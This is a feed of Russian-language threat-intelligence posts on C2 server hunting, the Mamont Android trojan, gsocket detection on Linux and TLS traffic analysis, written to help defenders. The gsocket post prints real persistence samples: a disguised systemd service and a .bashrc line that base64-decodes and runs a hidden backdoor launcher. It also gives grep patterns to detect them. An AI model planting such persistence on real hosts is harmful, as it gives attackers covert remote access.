Post recenti
Tag: #tips · 5 post
Pubblicato 17 feb
C2 hunting: часть 2. Ищем серверы хакеров по внешним признакам 😁 В предыдущей части мы с вами поговорили о том, как расширить знание об инфраструктуре хакеров, используя PDNS и Whois. Сегодня обсудим, как искать серверы хакеров не только когда они уже начали использовать свою инфраструктуру в атаках, но и в момент ее развертывания. Перед самой атакой хакеры, как правило, занимаются подготовкой инструментария и сетевой инфраструктуры. В моделях угроз этот этап обычно называется weaponization или resource development. Практически у любого ВПО в том или ином виде есть механизм коммуникации с C2. Сам C2 обладает рядом признаков, которые могут быть получены, если его просканировать или просто обратиться на конкретный порт, например 443. Так мы, скорее всего, получим параметры TLS-сертификата, параметры TLS-соединения, заголовки ответа сервера и содержимое веб-страницы. Соответственно, разбирая ВПО хакеров и анализируя их сетевую инфраструктуру, мы будем иметь представление об уникальных признаках, которые они используют на своих C2 для конкретного ВПО, что позволит нам в некоторых случаях обнаруживать их C2 в момент развертывания сетевой инфраструктуры для атаки и превентивно блокировать эти индикаторы на СЗИ. Список наиболее популярных признаков, которые можно использовать для идентификации С2: ✅ Параметры TLS-сертификата ✅ Параметры TLS-соединения (JA3, JA4, JARM и т. д.) ✅ Заголовки ответа от сервера ✅ Контент и title страницы ✅ Набор открытых портов ✅ Favicon Ограничить поиск всегда можно с помощью указания ASN, хостера или страны. Список сервисов, которые помогут вам искать С2 таким способом: ✅ Shodan ✅ Censys ✅ FOFA ✅ ZoomEye ✅ BinaryEdge ✅ Netlas ✅ ONYPHE ✅ Самописный сканер Руками искать по всем сервисам трудозатратно, но все же необходимо, так как каждый сервис может выдать разные результаты. Чтобы снизить затраты на ручной труд, нужна автоматизация. Мы у себя разработали систему SCANDAT, которая имеет внутренний поисковый синтаксис и автоматически генерирует поисковые правила под каждый сервис. 😠 На скриншотах 1–3 вы можете увидеть примеры запросов для обнаружения C2 для ВПО GoRed, которое использует группа ExCobalt. Кроме того, есть базовое опенсорс-решение для автоматизации запросов. В конечном итоге все идентифицированные C2 из нашей системы попадают в продукты компании, повышая уровень обнаружения угроз. 💡 Стоит отметить, что некоторые разработчики MaaS стараются противодействовать таким методам обнаружения. Например, с определенной версии Medusa Stealer ее разработчики убрали title, некоторый контент на странице и добавили генерацию случайных данных в TLS-сертификат, чтобы нельзя было идентифицировать панель управления стилером через популярные сервисы. Вы можете не только собирать такие серверы и отправлять их в фиды для СЗИ, но и писать эмуляторы сетевого протокола ВПО, чтобы со свежего С2 получить пейлоад или какой-либо модуль. Это позволит вам получить дополнительные индикаторы и атрибуционные признаки. #TI#C2#tips#hunt#malware @ptescalator
Pubblicato 10 feb
Лох не мамонт, APK не видео🦣 В конце 2024 — начале 2025 года в сети активно обсуждалась информация о распространении в Telegram вируса Mamont. Этот банковский троян, представляющий собой вредоносный .apk-файл, встречался нам с именами CBO-Information.apk, Фoтoгpaф.apk, Google Video.apk, Video.apk, Видео.apk, Фото.apk, Photo.apk, Докyмент <Количество штук>.apk и т. п. При установке на телефон — запрашивает разрешение на установку в качестве приложения для СМС по умолчанию. При закрытии скрывает от пользователя свое присутствие в системе, убирая значок из меню на главном экране. При этом в фоновом режиме собирает информацию об установленных приложениях, о сим-картах, СМС-сообщениях, вызовах, а также другие пользовательские данные и отправляет их на управляющий сервер. 🔑Пути проникновения на ваш Android Неизвестный отправляет вам в мессенджере файл с расширением .apk и спрашивает, не вы ли изображены на фото или видео. Иногда требует срочно открыть архив с документами, который представляет собой .apk-файл. Вирус также может попасть на устройство: • через фишинговые сайты; • через QR-коды для вступления в закрытые группы, каналы и т. п.; • под видом легитимных приложений (.apk-файлы не с официальных магазинов); • при наличии физического доступа у злоумышленника. 🔐Как не попасться 1️⃣ Будьте более внимательными: • не переходите по ссылкам из сообщений, не посмотрев, куда они ведут; • не вводите данные учетной записи на подозрительных ресурсах; • избегайте сканирования QR-кодов в общественных местах (они могут вести на фишинговые сайты); • не открывайте файлы из недоверенных источников. 2️⃣ Настройте конфиденциальность в мессенджере. Вы можете запретить приглашать вас в группы и отключить получение СМС-сообщений от незнакомых пользователей («Настройки» → «Конфиденциальность»). 3️⃣ При получении от знакомого голосовых, СМС- и видеосообщений с необычными просьбами свяжитесь с ним через альтернативные каналы (злоумышленники часто используют дипфейки). 4️⃣ Не храните пароли и банковские реквизиты в избранных сообщениях и чатах. 5️⃣ Устанавливайте приложения только из официальных магазинов и с сайтов разработчиков. Проверяйте запрашиваемые разрешения: если приложение требует доступ к данным, не соответствующим его функциональности, это может указывать на вредоносное ПО. 6️⃣ Регулярно проверяйте список установленных приложений — раздел «Приложения» («Установленные файлы» и т. п.) в параметрах устройства. Некоторое вредоносное ПО скрывает себя от пользователя. Можно также использовать средства для мониторинга активности, которые уведомят о подозрительных действиях. 7️⃣ Обращайте внимание на уведомления и поведение устройства. Если приходит много нетипичных уведомлений или устройство сильно нагревается в неактивном состоянии, это может быть признаком того, что оно заражено. 8️⃣ Регулярно обновляйте ОС и приложения. В обновлениях часто содержатся исправления безопасности. 9️⃣ Используйте проверенные антивирусы. 1️⃣0️⃣ Для защиты от физического доступа к устройству используйте надежный пароль. 1️⃣1️⃣ Регулярно создавайте резервные копии данных и храните их в безопасном месте. 1️⃣2️⃣ Для оценки ущерба при заражении мобильного устройства проведите его исследование. 1️⃣3️⃣ Постоянно обучайтесь и будьте в курсе новых угроз. Для общей осведомленности можете пройти бесплатные курсы Positive Technologies — «Личная кибербезопасность» и «Базовая кибербезопасность: первое погружение». 💡Помните, что APK (Android Package Kit) — это формат, используемый в контексте приложений, но никак не для фото- и видеофайлов. 🎁Бонус: опубликовали IoCs за 2025 год в Telegraph. #news#tips#malware @ptescalator
Pubblicato 3 ott
Gsocket: как найти один из самых популярных инструментов🙂 В процессе расследования множества инцидентов, связанных с компрометацией Linux-узлов, мы часто обнаруживаем на них различные хакерские инструменты. Одним из самых популярных из них является gsocket. Хакеры часто используют его для подключения к скомпрометированным узлам. 🔦 Для обнаружения признаков установки инструмента можно искать следующее: 1️⃣ Сервис с именем D-Bus System Connection Bus: systemctl | grep "D\-Bus System Connection Bus" Пример: EVILSERVICE.service loaded active running D-Bus System Connection Bus 2️⃣ Файлы, через которые может осуществляться закрепление в системе и в которых встречаются строки по следующему паттерну: 'D\-Bus System Connection Bus|GS_ARGS\=|echo .+\|base64 \-d\|bash.+seed prng.+kernel' egrep -ar 'D\-Bus System Connection Bus|GS_ARGS\=' /usr/lib/systemd/ /{lib,run,etc}/systemd/ egrep -aor 'echo .+\|base64 \-d\|bash.+seed prng.+kernel' / 👀Пример (service-файл): Description=D-Bus System Connection Bus After=network.target [Service] Type=simple Restart=always RestartSec=10 WorkingDirectory=/root ExecStart=/bin/bash -c "GS_ARGS='-ilq' exec -a '[abc]' '/usr/bin/abc'" [Install] WantedBy=multi-user.target 👀Пример (.bashrc): # ~/.bashrc: executed by bash(1) for non-login shells. # DO NOT REMOVE THIS LINE. SEED PRNG. #defunct-kernel { echo L3Vzci9iaW4vcGtpbGwgLTAgLVUxMDAxIGFiYyAyPi9kZXYvbnVsbCB8fCAoVEVSTT14dGVybS0yNTZjb2xvciBHU19BUkdTPSItayAvaG9tZS91c2VyLy5jb25maWcvaHRvcC9hYmMuZGF0IC1saXFEIiBleGVjIC1hICdbYWJjNXJyXScgJy9ob21lL3VzZXIvLmNvbmZpZy9odG9wL2FiYycgMj4vZGV2L251bGwpCg==|base64 -d|bash;} 2>/dev/null #34uhu4gg3g3g34g3 >/dev/random # seed prng abc-kernel # see /usr/share/doc/bash/examples/startup-files (in the package bash-doc) # for examples # If not running interactively, don't do anything case $- in *i*) ;; *) return;; esac .... 📌Для обнаружения признаков наличия инструмента на периметре можно поискать узлы, взаимодействующие с gsocket․io, а также серверами из поста. 📃Рекомендации по дальнейшим действиям: 1️⃣ Заблокировать адреса управляющих серверов; 2️⃣Удалить файлы, относящиеся к gsocket, а также изменить файлы, через которые gsocket закрепился в системе; 3️⃣ Перезагрузить скомпрометированный хост; 4️⃣ Осуществить поиск подозрительных входов по сети и проверку логов веб-сервера (если он есть и торчит наружу). #DFIR#detect#hacktool#tips#linux @ptescalator
Pubblicato 2 ott
TLS в сети: как быть🤷♂️ Ты — мощный движок разбора сетевого трафика. Ты работаешь на благо системы защиты информации, перемалывая терабайты проходящих через тебя данных. В твоих недрах крутятся десятки тысяч нефолзящих экспертных правил, тебе не страшны любые протоколы L7 — HTTP, SMTP, FTP, DNS. Но внезапно в тебя подают какую-то невнятную мешанину из байтиков сетевого соединения по 443-му порту, которая начинается с магических |1603| 🧙 «О нет!». Это же TLS, декрипт которого никто не удосужился сделать, и его инкапсулированное содержимое теперь скрыто от тебя. Но ведь внутри может быть что-то плохое, что-то вредоносное. Как же быть? Не расстраивайся! TLS-трафик в целом поддается анализу, хоть и не контентному. Можно выделить два основных метода: 1. Анализ информации из заголовков и сертификатов. 2. Анализ характеристик TCP-сессий. Анализ информации из заголовков и сертификатов (актуально для версии TLS ниже 1.3) Основные параметры заголовков, которые можно проанализировать: • Версия протокола. Например, SSL 3.0 или TLS 1.0. • Наборы шифров (cipher suites) — указывают на алгоритмы, которые будут использоваться для шифрования данных и создания MAC (Message Authentication Code). • Алгоритмы сжатия. • Порядок и типы поддерживаемых расширений. Например, расширение ALPN (Application-Layer Protocol Negotiation) используется для согласования протокола прикладного уровня (например, HTTP/2 или HTTP/3). Аспекты анализа сертификатов: • Цепочка сертификации: кто выдал сертификат (центр сертификации, CA), является ли цепочка валидной и корректно ли настроена. • Срок действия сертификата: просроченные или неправильно настроенные сертификаты свидетельствуют о небезопасной конфигурации сервера или атаке, например о MITM (man in the middle). • Подозрительные имена серверов (Common Name): они могут сигнализировать о поддельных или скомпрометированных сертификатах. Например, С2-сервер VenomRAT по умолчанию предоставляет интересную информацию о себе (скриншот 1). 🫵Дополнительно можно анализироватьцифровые отпечатки — уникальные идентификаторы клиентов, устанавливающих TLS-соединения, или серверов, принимающих такие соединения. В основе работы JA3 и JA3s лежат сбор характеристик во время TLS-рукопожатия и генерация отпечатка. JA3 — это хеш-функция, которая вычисляется с помощью алгоритма MD5 на основе параметров, передаваемых клиентом при установке TLS-соединения. В результате формируется уникальный идентификатор клиента — JA3-отпечаток (WARNING — может фолзить!). Например, JA3 a85be79f7b569f1df5e6087b69deb493 однозначно указывает на соединение ВПО Remcos с С2-сервером (скриншот 2). Детектирование на основании JA3 и JA3s поддерживают практически все сетевые СЗИ, в том числе и продукты Positive Technologies — PT NAD и PT Sandbox. Анализ TLS 1.3 — более сложная задача, но об этом в другой раз. Анализ характеристик TCP-сессий Анализатор может смотреть на характеристики TCP-сессий, инкапсулирующих зашифрованный трафик: на размер пакетов, их частоту и временные интервалы между ними. Даже не видя содержимого пакетов, DPI-система способна сделать выводы о типе трафика или возможной аномалии. В качестве примера можно привести бэкдор, который все делал правильно: «притащил» библиотеку для работы с SSL, пытаясь скрыть свои очень важные данные. Однако в сети он вел себя весьма интересно: клиент (то есть бэкдор) всегда отправлял на С2-сервер полезную нагрузку TCP размером 163 байта, а сервер отвечал ему полезной нагрузкой размером 166 байт (скриншот 3). Это или какой-то Heartbeat, или волшебный padding. Понаблюдав за бэкдором некоторое время, убедившись, что это поведение не просто аномалия, а повторяющийся шаблон, мы с чистой совестью покрыли его детектом. Вывод: увидел TLS — не расстраивайся. Happy hunting! 🎯 #detect#malware#network#hunt#tips @ptescalator
Pubblicato 16 set
C2 hunting: часть 1. Расширяем видимость сетевой инфраструктуры хакеров 😜 Часто при исследовании атаки, анализе TI или DFIR специалист сталкивается с сетевыми индикаторами компрометации (IP-адреса, домены, поддомены, URL-адреса), которые никак не идентифицируются TIP, фидами или сторонними сервисами, однако в рамках исследования являются вредоносными. Что специалист может сделать в этом случае? Прежде всего необходимо расширить область видимости вокруг индикатора. 💡Расширение видимости — это процесс получения новых, относящихся к атаке или потенциально с нею связанных сетевых индикаторов, которые могут помочь обнаружить связь с уже известным атакующим или ВПО, а также помочь DFIR-команде обнаружить другие скомпрометированные узлы. Сделать это можно несколькими основными способами: 1. Поиск связей с помощью базовой метаинформации индикатора. 2. Брутфорс поддоменов. 3. Поиск связей по внешним признакам управляющего сервера. 4. Активное сканирование интернета с помощью эмулятора сетевого протокола ВПО. 🤨Начнем с первого способа. У каждого типа сетевого индикатора есть своя метаинформация, которая позволяет сузить круг потенциальных кандидатов или найти точное совпадение. • Для IP-адреса это ASN, провайдер. • Для домена — поддомены, WHOIS-информация, DDNS или нет, стилистика написания, время резолва в определенный IP, DNS-записи. • Для URL-адреса — длина, параметры, значения. Основной системой, которая включает практически все вышеприведенные параметры и позволяет осуществлять по ним поиск, является Passive DNS. Passive DNS (PDNS) — система, которая хранит историю резолвов доменов в IP-адреса, их DNS-записи, поддомены и историю WHOIS. Правильный PDNS позволяет исследователю искать новые C2 с помощью практически любого вида информации, описанной выше. Например, система позволяет найти все домены: — которые когда-либо резолвились и резолвятся в определенный IP. — у которых в MX-записи определенный почтовый сервер. — у которых в WHOIS-информации определенный номер телефона и т.п. 🏴☠️Давайте рассмотрим пример с группировкой Space Pirates. Ее инфраструктура ранее состояла преимущественно из имен узлов DDNS четвертого уровня. На практике такое встречается достаточно редко, но как раз этот пример идеально подходит для демонстрации поиска новых серверов хакеров. Возьмем один из серверов, а именно chip.serviechelp.changeip[.]us. На VT видим резолвы в несколько IP-адресов. Откроем самый первый — 45.32.106[.]247 — и увидим, что на этом IP висит большое количество похожих поддоменов четвертого уровня. У IP-адреса мы видим ASN (20473) и имя провайдера (AS-CHOOPA), что в будущем поможет точнее исследовать сетевую инфраструктуру группировки. Далее нам необходимо просто собрать весь список индикаторов и для каждого повторить итерацию поиска новых IP и похожих доменов. 😎 Для исходного поддомена можно спуститься на один уровень ниже и найти все поддомены четвертого уровня для поддомена третьего. В этом случае в интерфейсе мы увидим историю резолвов для доменов следующего уровня, что поможет нам сэкономить немного времени в исследовании. Все эти методы работают для любой другой метаинформации сетевых индикаторов: WHOIS, DNS-записи, ASN, провайдер. Какую-то метаинформацию лучше использовать как ограничитель (например, ASN), так как иначе поиск выдаст слишком много результатов. По факту в исследовании сетевой инфраструктуры мы имеем дело с графом со множеством ребер и вершин. Однако этот граф конечен. Естественно, такие процессы лучше автоматизировать, так как инфраструктура атакующих может насчитывать тысячи узлов, как, например, у Space Pirates. Но зачастую у одного и того же злоумышленника инфраструктура для разных атак может быть разной и независимой, и ее исследование только по метаинформации будет ограниченным. Как еще можно искать связанные C2 хакеров, поговорим в следующих постах. 💡Базовый, условно бесплатный тулинг, который поможет в поиске новых C2: virustotal.com/gui/home/search securitytrails.com/ whoisxmlapi.com/ whoxy.com/ urlhaus.abuse.ch/ bgp.he.net/ Maltego #TI#C2#tips#hunt#ioc @ptescalator